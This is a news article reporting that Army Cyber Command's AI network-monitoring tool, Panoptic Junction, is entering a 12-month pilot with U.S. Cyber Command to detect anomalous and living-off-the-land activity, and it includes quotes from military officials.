Army Cyber AI monitoring tool moves to 12-month pilot
An artificial intelligence tool developed through Army Cyber Command for continuous monitoring of anomalous behavior on the network is moving into a year-long pilot with U.S. Cyber Command.
The tool, dubbed Panoptic Junction or PJ, is part of the Defense Department’s solution to fulfill a key directive in President Joe Biden’s watershed artificial intelligence executive order that, among many tasks, directed the secretary of defense to develop plans for, conduct and complete an operational pilot to “identify, develop, test, evaluate and deploy AI capabilities, such as large-language models, to aid in the discovery and remediation of vulnerabilities in critical United States Government software, systems, and networks.”
Cybercom is leading that effort on behalf of the DOD and, in working with Army Cyber Command, designated its Panoptic Junction tool to fulfill that directive.
Following a months-long prototyping effort, it was determined that the tool effectively detected malicious traffic, according to Lt. Gen. Maria Barrett, commander of Army Cyber Command.
“We determined that any missed detections were either unsuccessful attacks or behaviors that could be categorized as benign,” she said in an interview.
Following those favorable prototype results, PJ will enter into a 12-month pilot for Cybercom taking observations from the prototype and focusing on improved integration, usability, system performance, enhanced analytics and false positive reduction, she added.
PJ’s primary goal is to enhance the detection of anomalous and malicious cyber activity — including living off the land — through scalable and continuous monitoring. It is seen as a significant step towards more effective digital security.
Living-off-the-land techniques have come into sharp focus with the May 2023 disclosure of a Chinese actor called Volt Typhoon. That threat has been found to have penetrated U.S. critical infrastructure systems at an unprecedented scale — over a year later, the government is still finding remnants — signaling a paradigm shift in China’s cyber actions.
PJ uses AI-driven, programmatic access to Enterprise Mission Assurance Support Service (EMASS), the platform for authorizing IT systems, and threat intelligence to identify what risks most apply to a specific enclave’s architecture. It delivers those priorities to a second set of AI-driven functions to conduct event log analysis and identify anomalies or malicious activity. PJ is novel in that it uses artificial intelligence to link EMASS with continuous cybersecurity monitoring tools.
Cybercom officials have lauded PJ in the past, describing it as effective, fast and agile.
“ARCYBER is piloting an AI, machine learning platform that will enable scalable, continuous security monitoring of networks and platforms. It analyzes system compliance, threat intelligence and streaming cyber event data, which will enable advanced detection of adversary activity, malware and anomalies at speeds that human analysts would not come close to,” Morgan Adamski, executive director of Cybercom, said at the CyberTalks conference in October. “But not only is it fast, it’s agile. It is rapidly taking the pulse of networks and assimilating threat information simultaneously, protecting networks in real time … It’s increased efficiencies in operations and maintenance. It’s improved our ability to identify risk and detect adversary activity. It’s … provided real -time hardening recommendations and improved the technical ability of our force.”
